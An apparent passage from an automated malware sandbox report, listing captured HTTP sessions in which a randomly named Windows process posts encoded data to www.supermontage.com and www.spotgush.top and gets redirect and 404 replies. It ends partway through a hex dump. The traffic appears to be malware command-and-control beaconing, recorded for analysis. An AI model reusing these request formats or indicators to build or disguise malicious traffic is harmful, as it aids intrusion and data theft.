9	192.168.2.12	49732	13.248.169.48	80	3192	C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:21:15.157181978 CEST	706	OUT	POST /9i8t/ HTTP/1.1 Host: www.supermontage.com Accept: / Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Origin: http://www.supermontage.com Cache-Control: no-cache Connection: close Content-Length: 205 Content-Type: application/x-www-form-urlencoded Referer: http://www.supermontage.com/9i8t/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit (KHTML, like Gecko) Mobile (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Data Raw: 56 6c 45 48 44 56 76 68 3d 37 52 52 65 71 7a 47 6e 75 77 71 71 51 71 52 46 32 5a 4f 77 54 6f 2b 79 4b 42 65 30 36 6d 74 47 6e 32 46 6a 59 38 52 32 49 62 67 47 53 68 54 64 30 46 7a 76 2f 77 32 71 52 73 2f 6b 62 37 67 74 70 6b 73 47 70 41 44 53 4b 72 30 5a 56 75 38 5a 53 53 59 6c 6f 6e 2f 6b 4f 5a 74 4f 68 57 56 32 73 78 6b 62 4f 33 6f 77 2f 66 62 45 4e 54 38 6d 6b 36 67 77 67 55 68 55 6a 63 6d 4e 56 4b 76 6a 2b 66 31 79 39 6a 48 33 52 70 5a 57 46 69 52 51 72 7a 6f 55 35 4d 70 4b 6f 6b 78 33 34 75 4c 33 31 67 44 41 35 6a 73 47 4a 6d 6e 61 6c 66 4f 64 77 46 56 34 68 48 4d 30 2b 4e 72 31 77 34 38 45 32 77 3d 3d Data Ascii: VlEHDVvh=7RReqzGnuwqqQqRF2ZOwTo+yKBe06mtGn2FjY8R2IbgGShTd0Fzv/w2qRs/kb7gtpksGpADSKr0ZVu8ZSSYlon/kOZtOhWV2sxkbO3ow/fbENT8mk6gwgUhUjcmNVKvj+f1y9jH3RpZWFiRQrzoU5MpKokx34uL31gDA5jsGJmnalfOdwFV4hHM0+Nr1w48E2w==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.12	49733	13.248.169.48	80	3192	C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:21:17.689939022 CEST	726	OUT	POST /9i8t/ HTTP/1.1 Host: www.supermontage.com Accept: / Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Origin: http://www.supermontage.com Cache-Control: no-cache Connection: close Content-Length: 225 Content-Type: application/x-www-form-urlencoded Referer: http://www.supermontage.com/9i8t/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit (KHTML, like Gecko) Mobile (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Data Raw: 56 6c 45 48 44 56 76 68 3d 37 52 52 65 71 7a 47 6e 75 77 71 71 52 4c 68 46 77 36 6d 77 43 34 2b 78 45 68 65 30 7a 47 74 43 6e 32 4a 6a 59 39 45 70 49 4a 45 47 52 45 76 64 31 45 7a 76 38 77 32 71 45 63 2f 62 66 37 67 63 70 6b 67 77 70 41 76 53 4b 72 77 5a 56 72 59 5a 54 6c 73 6b 36 48 2f 6d 47 35 74 41 76 32 56 32 73 78 6b 62 4f 33 74 72 2f 66 44 45 4e 6a 73 6d 6c 66 63 78 2f 6b 68 58 31 4d 6d 4e 45 36 76 6e 2b 66 31 41 39 6d 65 51 52 71 74 57 46 69 68 51 71 68 51 4c 69 63 70 4d 6d 45 77 38 33 66 79 35 39 44 36 41 6b 42 6c 6c 47 56 2f 46 67 5a 66 48 76 33 64 75 30 45 59 35 7a 61 53 46 39 37 42 4e 74 2f 66 70 6d 58 4a 4a 54 6c 6e 62 62 49 48 32 76 46 6a 61 46 2b 4d 3d Data Ascii: VlEHDVvh=7RReqzGnuwqqRLhFw6mwC4+xEhe0zGtCn2JjY9EpIJEGREvd1Ezv8w2qEc/bf7gcpkgwpAvSKrwZVrYZTlsk6H/mG5tAv2V2sxkbO3tr/fDENjsmlfcx/khX1MmNE6vn+f1A9meQRqtWFihQqhQLicpMmEw83fy59D6AkBllGV/FgZfHv3du0EY5zaSF97BNt/fpmXJJTlnbbIH2vFjaF+M=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.12	49734	13.248.169.48	80	3192	C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:21:20.222053051 CEST	1739	OUT	POST /9i8t/ HTTP/1.1 Host: www.supermontage.com Accept: / Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Origin: http://www.supermontage.com Cache-Control: no-cache Connection: close Content-Length: 1237 Content-Type: application/x-www-form-urlencoded Referer: http://www.supermontage.com/9i8t/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit (KHTML, like Gecko) Mobile (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Data Raw: 56 6c 45 48 44 56 76 68 3d 37 52 52 65 71 7a 47 6e 75 77 71 71 52 4c 68 46 77 36 6d 77 43 34 2b 78 45 68 65 30 7a 47 74 43 6e 32 4a 6a 59 39 45 70 49 4a 4d 47 52 32 33 64 30 6e 62 76 39 77 32 71 59 4d 2f 61 66 37 67 37 70 6b 35 35 70 41 7a 6f 4b 70 34 5a 56 49 67 5a 55 52 77 6b 77 48 2f 6d 4b 5a 74 42 68 57 55 30 73 78 30 66 4f 33 39 72 2f 66 44 45 4e 6c 67 6d 73 71 67 78 39 6b 68 55 6a 63 6d 42 56 4b 76 62 2b 66 39 36 39 6e 72 6e 51 63 64 57 45 47 46 51 73 55 45 4c 2f 4d 70 4f 68 45 77 76 33 65 4f 79 39 44 33 35 6b 41 51 4b 47 55 4c 46 73 64 4f 47 35 7a 52 72 33 47 4d 34 77 49 2b 52 2f 71 77 4b 68 34 44 6c 71 42 35 47 62 45 44 4a 52 66 79 48 37 56 54 45 52 37 61 6b 70 71 78 58 48 41 55 51 72 50 7a 4c 42 33 79 36 6d 42 47 4c 37 42 41 79 32 73 58 49 48 55 43 2b 34 7a 43 41 42 61 65 39 35 54 6e 31 4e 76 31 6d 51 2b 67 66 48 34 49 75 59 33 7a 7a 79 39 33 59 73 69 75 78 72 67 41 72 37 4c 6e 67 62 4d 49 6c 6b 6f 44 46 7a 52 73 42 68 66 62 66 56 34 61 47 2b 45 4c 53 79 34 54 4c 69 79 69 66 33 6a 55 54 70 [TRUNCATED] Data Ascii: VlEHDVvh=7RReqzGnuwqqRLhFw6mwC4+xEhe0zGtCn2JjY9EpIJMGR23d0nbv9w2qYM/af7g7pk55pAzoKp4ZVIgZURwkwH/mKZtBhWU0sx0fO39r/fDENlgmsqgx9khUjcmBVKvb+f969nrnQcdWEGFQsUEL/MpOhEwv3eOy9D35kAQKGULFsdOG5zRr3GM4wI+R/qwKh4DlqB5GbEDJRfyH7VTER7akpqxXHAUQrPzLB3y6mBGL7BAy2sXIHUC+4zCABae95Tn1Nv1mQ+gfH4IuY3zzy93YsiuxrgAr7LngbMIlkoDFzRsBhfbfV4aG+ELSy4TLiyif3jUTpe2jXTuFyJyLBenMdHP/XAVJZULx4ApVx2Gr8qLiFe5VzSCi4vwKWQNnnVl4+GtWTsr5oKW+MtehqjtCa89bVBKiucb/GqMfRsWd4cU9y3cZ6YlMnUDFZWb3uPTFacXzk4i5NqOeFMyHpQclKRjGlybKoa/nUugUSVi7B1QwLJ3fjbxnL57cfJXYeJ9ZVdJcXEPamWx2Igx7vXw4evbmDVKTofJ+ViilL7QlrqghZB5Rx2+QiFW1DTXWmPSaRqDeVwrqtheR75NO+vG0txjgyEZ2vaxCf9lUl9z20xIYBRjwHf8kgC/Uf6NKrk3Y4bR8vR1NJ7E9y40xIpMci8B70xlUXEAE6S1quYBYi80iAzvJo3vFOCq4H3v6ap10nld3JPWJ8IFXkxpFnFFVhzMZ1vep5Q4kczE7w3aYyMxLShxXsePG8xuwC3uMTlobppaAQ5VTlhSkaDX0h0D+ILMG8xn5oslY89PwSi3X4qgUd3yEcYsp95nS/hvfobCLOy2Ymjvv693iIRAzPzypJGtB9EvI/HvXbz7iDIPZUTiKPjb9sZzVIVlT+lJSHJK0LenTTI/Daksq07Ul/rDUV0nYmMc/w6wl0M9ioBBK3xqEI3O3JGVqi9Sf5vF96E629rksHXG3xGRf03yjJ92oAoaExyfY5o5HCZmKS0z [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.12	49735	13.248.169.48	80	3192	C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:21:22.767600060 CEST	428	OUT	GET /9i8t/?VlEHDVvh=2T5+pGPdigXxZZx8gY/OSLODLjvvwj0MjlV7S+1Ldbgia1Gm71jO+3C1ccfYbIwVvCUgnk/aeboESokRLTli2QWqQswZxn4Hxw0zC18njeajG3czp+Bsx3U=&BHPD=o2nt HTTP/1.1 Host: www.supermontage.com Accept: / Accept-Language: en-US,en Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit (KHTML, like Gecko) Mobile (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
May 27, 2024 12:21:23.232510090 CEST	394	IN	HTTP/1.1 200 OK Server: openresty Date: Mon, 27 May 2024 10:21:23 GMT Content-Type: text/html Content-Length: 254 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 56 6c 45 48 44 56 76 68 3d 32 54 35 2b 70 47 50 64 69 67 58 78 5a 5a 78 38 67 59 2f 4f 53 4c 4f 44 4c 6a 76 76 77 6a 30 4d 6a 6c 56 37 53 2b 31 4c 64 62 67 69 61 31 47 6d 37 31 6a 4f 2b 33 43 31 63 63 66 59 62 49 77 56 76 43 55 67 6e 6b 2f 61 65 62 6f 45 53 6f 6b 52 4c 54 6c 69 32 51 57 71 51 73 77 5a 78 6e 34 48 78 77 30 7a 43 31 38 6e 6a 65 61 6a 47 33 63 7a 70 2b 42 73 78 33 55 3d 26 42 48 50 44 3d 6f 32 6e 74 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?VlEHDVvh=2T5+pGPdigXxZZx8gY/OSLODLjvvwj0MjlV7S+1Ldbgia1Gm71jO+3C1ccfYbIwVvCUgnk/aeboESokRLTli2QWqQswZxn4Hxw0zC18njeajG3czp+Bsx3U=&BHPD=o2nt"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.12	49736	66.29.149.46	80	3192	C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:21:28.683201075 CEST	694	OUT	POST /ni9v/ HTTP/1.1 Host: www.spotgush.top Accept: / Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Origin: http://www.spotgush.top Cache-Control: no-cache Connection: close Content-Length: 205 Content-Type: application/x-www-form-urlencoded Referer: http://www.spotgush.top/ni9v/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit (KHTML, like Gecko) Mobile (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Data Raw: 56 6c 45 48 44 56 76 68 3d 34 6f 72 43 2f 6c 34 57 63 58 2b 2b 38 70 64 65 79 5a 2f 49 6e 6a 31 46 55 79 6d 56 77 54 71 4e 6c 67 4e 74 2b 65 73 6c 64 69 64 6c 72 71 44 70 77 53 39 78 61 57 32 2b 73 49 6e 52 6e 4b 6a 69 58 67 39 61 31 67 42 45 4f 63 55 33 33 74 48 61 38 2b 31 6e 6e 56 79 76 46 78 50 4c 43 32 6f 70 33 50 6a 69 79 75 55 48 2b 44 65 44 57 66 79 42 57 79 45 58 7a 64 30 6f 70 77 70 34 63 67 67 4a 51 6a 65 32 51 70 4f 70 4d 4c 49 57 5a 41 59 30 72 76 52 70 61 70 6b 6f 49 4f 56 74 36 53 67 34 64 56 4c 2f 30 48 38 69 33 2b 7a 71 39 37 4b 36 77 4c 32 4d 79 32 78 42 59 71 59 74 74 51 31 4d 2b 77 3d 3d Data Ascii: VlEHDVvh=4orC/l4WcX++8pdeyZ/Inj1FUymVwTqNlgNt+esldidlrqDpwS9xaW2+sInRnKjiXg9a1gBEOcU33tHa8+1nnVyvFxPLC2op3PjiyuUH+DeDWfyBWyEXzd0opwp4cggJQje2QpOpMLIWZAY0rvRpapkoIOVt6Sg4dVL/0H8i3+zq97K6wL2My2xBYqYttQ1M+w==
May 27, 2024 12:21:29.305818081 CEST	637	IN	HTTP/1.1 404 Not Found Date: Mon, 27 May 2024 10:21:29 GMT Server: Apache Content-Length: 493 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.12	49737	66.29.149.46	80	3192	C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:21:31.217624903 CEST	714	OUT	POST /ni9v/ HTTP/1.1 Host: www.spotgush.top Accept: / Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Origin: http://www.spotgush.top Cache-Control: no-cache Connection: close Content-Length: 225 Content-Type: application/x-www-form-urlencoded Referer: http://www.spotgush.top/ni9v/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit (KHTML, like Gecko) Mobile (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Data Raw: 56 6c 45 48 44 56 76 68 3d 34 6f 72 43 2f 6c 34 57 63 58 2b 2b 75 61 56 65 2b 65 72 49 77 54 31 47 62 53 6d 56 2b 7a 71 4a 6c 67 52 74 2b 66 5a 34 64 52 70 6c 71 4f 48 70 7a 58 4a 78 62 57 32 2b 6e 6f 6e 51 70 71 6a 72 58 67 67 76 31 6b 4a 45 4f 66 6f 33 33 74 33 61 70 5a 68 34 68 56 79 58 51 68 50 46 4e 57 6f 70 33 50 6a 69 79 75 42 51 2b 43 32 44 58 76 69 42 45 51 73 55 74 4e 30 76 6a 51 70 34 59 67 67 46 51 6a 66 6a 51 73 76 2b 4d 49 38 57 5a 43 41 30 6f 2b 52 6f 55 5a 6b 71 48 75 55 4a 38 58 35 77 54 45 72 46 34 46 41 77 39 61 6a 78 78 64 62 67 76 35 2b 61 6e 31 6c 4d 56 39 68 64 67 54 49 46 6c 31 68 58 62 34 75 51 73 4e 57 41 68 37 53 4f 37 77 61 6b 68 41 59 3d Data Ascii: VlEHDVvh=4orC/l4WcX++uaVe+erIwT1GbSmV+zqJlgRt+fZ4dRplqOHpzXJxbW2+nonQpqjrXggv1kJEOfo33t3apZh4hVyXQhPFNWop3PjiyuBQ+C2DXviBEQsUtN0vjQp4YggFQjfjQsv+MI8WZCA0o+RoUZkqHuUJ8X5wTErF4FAw9ajxxdbgv5+an1lMV9hdgTIFl1hXb4uQsNWAh7SO7wakhAY=
May 27, 2024 12:21:31.806731939 CEST	637	IN	HTTP/1.1 404 Not Found Date: Mon, 27 May 2024 10:21:31 GMT Server: Apache Content-Length: 493 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.12	49738	66.29.149.46	80	3192	C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:21:33.750099897 CEST	1727	OUT	POST /ni9v/ HTTP/1.1 Host: www.spotgush.top Accept: / Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Origin: http://www.spotgush.top Cache-Control: no-cache Connection: close Content-Length: 1237 Content-Type: application/x-www-form-urlencoded Referer: http://www.spotgush.top/ni9v/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit (KHTML, like Gecko) Mobile (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Data Raw: 56 6c 45 48 44 56 76 68 3d 34 6f 72 43 2f 6c 34 57 63 58 2b 2b 75 61 56 65 2b 65 72 49 77 54 31 47 62 53 6d 56 2b 7a 71 4a 6c 67 52 74 2b 66 5a 34 64 52 78 6c 72 37 54 70 7a 77 56 78 64 6d 32 2b 6b 6f 6e 56 70 71 69 37 58 67 70 6e 31 6b 45 78 4f 5a 73 33 6d 2b 50 61 34 4c 5a 34 79 31 79 58 49 52 50 45 43 32 70 6a 33 50 79 72 79 75 52 51 2b 43 32 44 58 71 75 42 42 79 45 55 76 4e 30 6f 70 77 70 30 63 67 67 70 51 6a 57 55 51 73 61 44 4d 62 6b 57 5a 68 34 30 34 59 39 6f 57 35 6b 53 54 4f 55 52 38 58 39 2f 54 45 32 2b 34 42 41 65 39 64 50 78 67 63 61 37 31 59 53 38 7a 6b 46 54 59 39 4a 46 73 6b 34 51 68 31 56 49 51 65 57 6c 73 4e 4f 71 75 5a 48 2f 6e 78 61 51 67 56 45 34 44 66 50 34 48 46 70 33 57 4a 70 58 68 4c 38 46 47 70 51 76 72 59 48 32 70 69 6a 5a 6e 77 2f 57 52 46 44 44 36 4c 36 2f 62 36 54 76 54 77 56 66 73 4e 72 55 52 52 5a 4c 4e 4d 62 6e 47 33 66 2b 72 44 6d 41 47 6f 64 33 41 43 69 70 35 72 5a 78 4e 51 39 6e 4f 78 37 50 79 4f 56 33 39 4f 71 59 35 33 77 33 70 63 6b 63 4c 57 65 7a 68 55 75 5a 51 [TRUNCATED] Data Ascii: VlEHDVvh=4orC/l4WcX++uaVe+erIwT1GbSmV+zqJlgRt+fZ4dRxlr7TpzwVxdm2+konVpqi7Xgpn1kExOZs3m+Pa4LZ4y1yXIRPEC2pj3PyryuRQ+C2DXquBByEUvN0opwp0cggpQjWUQsaDMbkWZh404Y9oW5kSTOUR8X9/TE2+4BAe9dPxgca71YS8zkFTY9JFsk4Qh1VIQeWlsNOquZH/nxaQgVE4DfP4HFp3WJpXhL8FGpQvrYH2pijZnw/WRFDD6L6/b6TvTwVfsNrURRZLNMbnG3f+rDmAGod3ACip5rZxNQ9nOx7PyOV39OqY53w3pckcLWezhUuZQsdfwrOJc8QPTvRkuze8YvSxznoVF6VhrEaLwKDL4YJ5yeTOw/3IO/AyruOzqq3ZT07jiBgMBGNEnAEvR5wRfxQrEeFoDXAJuLfEs2g2AmpaOcnFXxi4qRpTB70N2ITiqyniv/FpfvGPTZVRQfsv1h9KtJ1NY3Kebqi3C3mGHINc1my7CSLN1OASJYzpmvVhQKYis5QS9g356OrYX9Cohn7m+oaumJR2VLBKyEUvCn2/guSvbKnKfV5e4VEcNIKUgSRn7HrlmcAyvKWdGEt52KWbW4dSTbldGu33gnSR0JWAfiTQq8g8b8/lLSOa63yxPQyTF/CAWogSGxKJyrwQj+GL8ImIbQ1jRcYs41po3khSAq3dlI+lgEC41LFR5vHgtJ5rOcE/ezXmzLx5aXy8JI3c07sq8FO/MsdT1+o1VNtsFYFWl2hGi/5J1bE5m/YIxXG1feqHvcvKoymgGfI19ZOlPx68dD5+NQwrgrKGV5beuMLYGnYJ9iBaEgMsKm2JyxU9mmbCP3aK9SBEDRUrTfUd26OV+1Q7Y7QDwgVr28/3dLKfqnlmzt7RixwIgSy3YVOlwtbt6AK69vgiKOZBwAAg6LNkDqhXd09GCPCkVD7fyNQyd/hPAPP7NhZDlWE5P/Mjfd20PXCmPmAxf1F9wYbtpPZcTWjAlBy [TRUNCATED]
May 27, 2024 12:21:34.364387035 CEST	637	IN	HTTP/1.1 404 Not Found Date: Mon, 27 May 2024 10:21:34 GMT Server: Apache Content-Length: 493 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.12	49739	66.29.149.46	80	3192	C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:21:36.281570911 CEST	424	OUT	GET /ni9v/?VlEHDVvh=1qDi8Q0JYC/+jowmm6vhnz1nUg+FzSnwkBEF+9sZfgdAuqPr9wV9FjKgoqnVlqm9IHxz/wQEEdcJ3vr/ooFd412OQCGzSxMe6/jXu+QS8SjFcrOZORUu8fo=&BHPD=o2nt HTTP/1.1 Host: www.spotgush.top Accept: / Accept-Language: en-US,en Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit (KHTML, like Gecko) Mobile (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
May 27, 2024 12:21:36.891031027 CEST	652	IN	HTTP/1.1 404 Not Found Date: Mon, 27 May 2024 10:21:36 GMT Server: Apache Content-Length: 493 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 